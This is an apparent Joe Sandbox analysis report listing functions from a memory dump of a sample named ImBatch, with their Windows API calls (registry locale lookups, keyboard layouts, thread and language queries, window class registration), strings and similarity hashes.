RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 1080A13C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,1080A228,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 1080A17C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,1080A228,?,80000001), ref: 1080A1A7
RegQueryValueExW.ADVAPI32(?,1080A2FC,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,1080A228,?,80000001), ref: 1080A1CB
RegQueryValueExW.ADVAPI32(?,1080A2FC,00000000,00000000,?,?,?,1080A2FC,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 1080A1F4
RegCloseKey.ADVAPI32(?,1080A22F,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,1080A228,?,80000001,Software\CodeGear\Locales), ref: 1080A222

Strings

Software\CodeGear\Locales, xrefs: 1080A0D8, 1080A0F6
Software\Borland\Delphi\Locales, xrefs: 1080A132
Software\Borland\Locales, xrefs: 1080A114

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
API String ID: 3482678030-345420546
Opcode ID: 9df7c6d53361911d3eb6a80f2fac6355b8c9c16fdbd6fb5c130fec0000fd8d09
Instruction ID: 9b1fc62e6f837e6a24f99707bdaa9eba3be9da99bdd40e480d2f31e469843c54
Opcode Fuzzy Hash: 9df7c6d53361911d3eb6a80f2fac6355b8c9c16fdbd6fb5c130fec0000fd8d09
Instruction Fuzzy Hash: EB511475A4824DBEEB50DA98CC42FEEB3BCEB08700F514171B614E6198DBB1AA44DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1089EC90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 126
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,1089EE3D,?,00000000,?,1089EEE1,00000000,10874FE4,108CAD6F), ref: 1089ECE8
RegOpenKeyExW.ADVAPI32(80000002,00000000), ref: 1089ED50
RegQueryValueExW.ADVAPI32(?,layout text,00000000,00000000,?,00000200,00000000,1089EDF9,?,80000002,00000000), ref: 1089ED8A
RegCloseKey.ADVAPI32(?,1089EE00,00000000,?,00000200,00000000,1089EDF9,?,80000002,00000000), ref: 1089EDF3

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 1089ED3A
layout text, xrefs: 1089ED81

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: 7feb26c5a22d0339dc4c11d9ee2e010a6d2ab50785929f3c6f8af89af0eba89f
Instruction ID: 7bf2ce9c6ca81a3b9cc6811b00ae3638761f9367850aa2c9017766a236b03b1d
Opcode Fuzzy Hash: 7feb26c5a22d0339dc4c11d9ee2e010a6d2ab50785929f3c6f8af89af0eba89f
Instruction Fuzzy Hash: 3E411678A08209DFDB11EF98CD81B9EB7F9FB89300F9144A5E905A7391D770AE44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 108063C4 Relevance: 6.1, APIs: 4, Instructions: 145
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 108063FB

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 37e11dc98cfd5fd26acfa50e2e15a28627049947292b0b09595b51f9ab39c680
Instruction ID: c664a7415d743a29707cfe173794eb4597dd46b614408875f4f558f237cf4390
Opcode Fuzzy Hash: 37e11dc98cfd5fd26acfa50e2e15a28627049947292b0b09595b51f9ab39c680
Instruction Fuzzy Hash: 9751AD74A082558FDB54DF6CCCC434A37E0EF0C368F658269E8158B259CB75DCA2CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1080A510 Relevance: 6.1, APIs: 4, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpynW.KERNEL32(?,00000000,00000105,00000000,1080A6AF,?,1080FC30,?,00000000), ref: 1080A58B
lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,1080A6AF,?,1080FC30,?,00000000), ref: 1080A597
GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,1080A6AF,?,1080FC30,?,00000000), ref: 1080A624
GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,1080A6AF,?,1080FC30,?,00000000), ref: 1080A650

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
String ID:
API String ID: 3749826553-0
Opcode ID: c8c147092fa635029496f57e678f25895d0b54ad00c907aef664446db0f39992
Instruction ID: fc81eb3fd312e14b6e0b0f38a883e05fdde6e1f9e4c00d60672deea1a157aa95
Opcode Fuzzy Hash: c8c147092fa635029496f57e678f25895d0b54ad00c907aef664446db0f39992
Instruction Fuzzy Hash: CA417C39A482199FC760DB68DC89BCDB3F9FF18310F5446E5E40897259EB74AE808E58

Uniqueness

Uniqueness Score: -1.00%

Function 108447C8 Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32 ref: 108447E9
UnregisterClassW.USER32 ref: 10844812
RegisterClassW.USER32 ref: 1084481C
SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 10844867

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: b1729ab9c568e6263296748daad95e210d38be6616d407b58d7e553746bfe988
Instruction ID: 443fd6360767264f779518723cad29a63df76b5370a66502c07b9b21c8d55f81
Opcode Fuzzy Hash: b1729ab9c568e6263296748daad95e210d38be6616d407b58d7e553746bfe988
Instruction Fuzzy Hash: 86015E717482586BDB40EFECCCC1F6E7798E758200F208211FA04DB290DE72AC46C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 108066C4 Relevance: 4.6, APIs: 3, Instructions: 81
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 108066FD
FreeLibrary.KERNEL32(?,?,?,?,00000001,108067E2,108043B7,108043FE,?,?,?,?,?,10A64B0F,00000000,10A64C0F), ref: 1080677E
ExitProcess.KERNEL32(00000000,?,?,?,00000001,108067E2,108043B7,108043FE,?,?,?,?,?,10A64B0F,00000000,10A64C0F), ref: 108067BA

Part of subcall function 1080663C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?,?,00000001,108067E2,108043B7,108043FE,?,?), ref: 10806675
Part of subcall function 1080663C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?,?,00000001,108067E2,108043B7,108043FE,?), ref: 1080667B
Part of subcall function 1080663C: GetStdHandle.KERNEL32(000000F5,108066C8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?), ref: 10806690
Part of subcall function 1080663C: WriteFile.KERNEL32(00000000,000000F5,108066C8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?), ref: 10806696

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID:
API String ID: 3490077880-0
Opcode ID: c0301a633364722a5f9ea4a196f6e32c9317df5d628700b8452ef14374b39209
Instruction ID: 4ad4b6ec90411a53fd11420efcfe302ce9ed552a806e7f8ad0ba0dff1b1148f3
Opcode Fuzzy Hash: c0301a633364722a5f9ea4a196f6e32c9317df5d628700b8452ef14374b39209
Instruction Fuzzy Hash: E1319F35A082A18FDB11EFAC8C8434937E0EB0D25CF364665E8018B25DCB759CE2CB91

Uniqueness

Uniqueness Score: -1.00%

Function 108421BC Relevance: 4.6, APIs: 3, Instructions: 80
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000004,?,00000000,10842299,?,109F83CC,109F83CC), ref: 1084223D
GetCurrentThread.KERNEL32 ref: 10842273
GetCurrentThreadId.KERNEL32 ref: 1084227B

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CurrentThread$ErrorLast
String ID:
API String ID: 4172138867-0
Opcode ID: 5d0a62dc065565449f73997d79c3c17c305b96976acc42c2015c0dbbb7756d76
Instruction ID: ff5dbd032dc18280fa8c3047c2bc59a6196763d0a745721d9780fae676b83bfb
Opcode Fuzzy Hash: 5d0a62dc065565449f73997d79c3c17c305b96976acc42c2015c0dbbb7756d76
Instruction Fuzzy Hash: EE210674A0C7699ED711DFB88C8179BFBE5EF09250FA08829E951C7680E7B0B904DB61

Uniqueness

Uniqueness Score: -1.00%

Function 108066C8 Relevance: 4.6, APIs: 3, Instructions: 79
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 108066FD
FreeLibrary.KERNEL32(?,?,?,?,00000001,108067E2,108043B7,108043FE,?,?,?,?,?,10A64B0F,00000000,10A64C0F), ref: 1080677E
ExitProcess.KERNEL32(00000000,?,?,?,00000001,108067E2,108043B7,108043FE,?,?,?,?,?,10A64B0F,00000000,10A64C0F), ref: 108067BA

Part of subcall function 1080663C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?,?,00000001,108067E2,108043B7,108043FE,?,?), ref: 10806675
Part of subcall function 1080663C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?,?,00000001,108067E2,108043B7,108043FE,?), ref: 1080667B
Part of subcall function 1080663C: GetStdHandle.KERNEL32(000000F5,108066C8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?), ref: 10806690
Part of subcall function 1080663C: WriteFile.KERNEL32(00000000,000000F5,108066C8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?), ref: 10806696

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID:
API String ID: 3490077880-0
Opcode ID: 5874809673bb74e6b03caaf888ebcc2bef20fae92e90f78674c4c2be93a6462b
Instruction ID: f9199350412e8dcf744094b219b068c75cb1270b07ad95b0c863b1111a07cfca
Opcode Fuzzy Hash: 5874809673bb74e6b03caaf888ebcc2bef20fae92e90f78674c4c2be93a6462b
Instruction Fuzzy Hash: F4318E75A082658FDB51EFAC8C8434937E0EB0D25CF365765E8018B24DCB759CE2CB91

Uniqueness

Uniqueness Score: -1.00%

Function 108066CC Relevance: 4.6, APIs: 3, Instructions: 79
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 108066FD
FreeLibrary.KERNEL32(?,?,?,?,00000001,108067E2,108043B7,108043FE,?,?,?,?,?,10A64B0F,00000000,10A64C0F), ref: 1080677E
ExitProcess.KERNEL32(00000000,?,?,?,00000001,108067E2,108043B7,108043FE,?,?,?,?,?,10A64B0F,00000000,10A64C0F), ref: 108067BA

Part of subcall function 1080663C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?,?,00000001,108067E2,108043B7,108043FE,?,?), ref: 10806675
Part of subcall function 1080663C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?,?,00000001,108067E2,108043B7,108043FE,?), ref: 1080667B
Part of subcall function 1080663C: GetStdHandle.KERNEL32(000000F5,108066C8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?), ref: 10806690
Part of subcall function 1080663C: WriteFile.KERNEL32(00000000,000000F5,108066C8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?), ref: 10806696

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID:
API String ID: 3490077880-0
Opcode ID: 77b819ca6674a70fe2e0793c40323b114d44e256dd702cd0f78df9aa9f715bf6
Instruction ID: 493730d1b01e4290fdbcea4d2268ae507ae9a033d2ba2e12c6af1f3d46c780c3
Opcode Fuzzy Hash: 77b819ca6674a70fe2e0793c40323b114d44e256dd702cd0f78df9aa9f715bf6
Instruction Fuzzy Hash: CB318D75A082658FDB51EFAC8C8434937E0EB0C29CF365765E8018B24DCB75ACE2CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1080A300 Relevance: 3.1, APIs: 2, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,1080A3BA,?,?,00000000), ref: 1080A33C

Part of subcall function 1080A510: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,1080A6AF,?,1080FC30,?,00000000), ref: 1080A58B
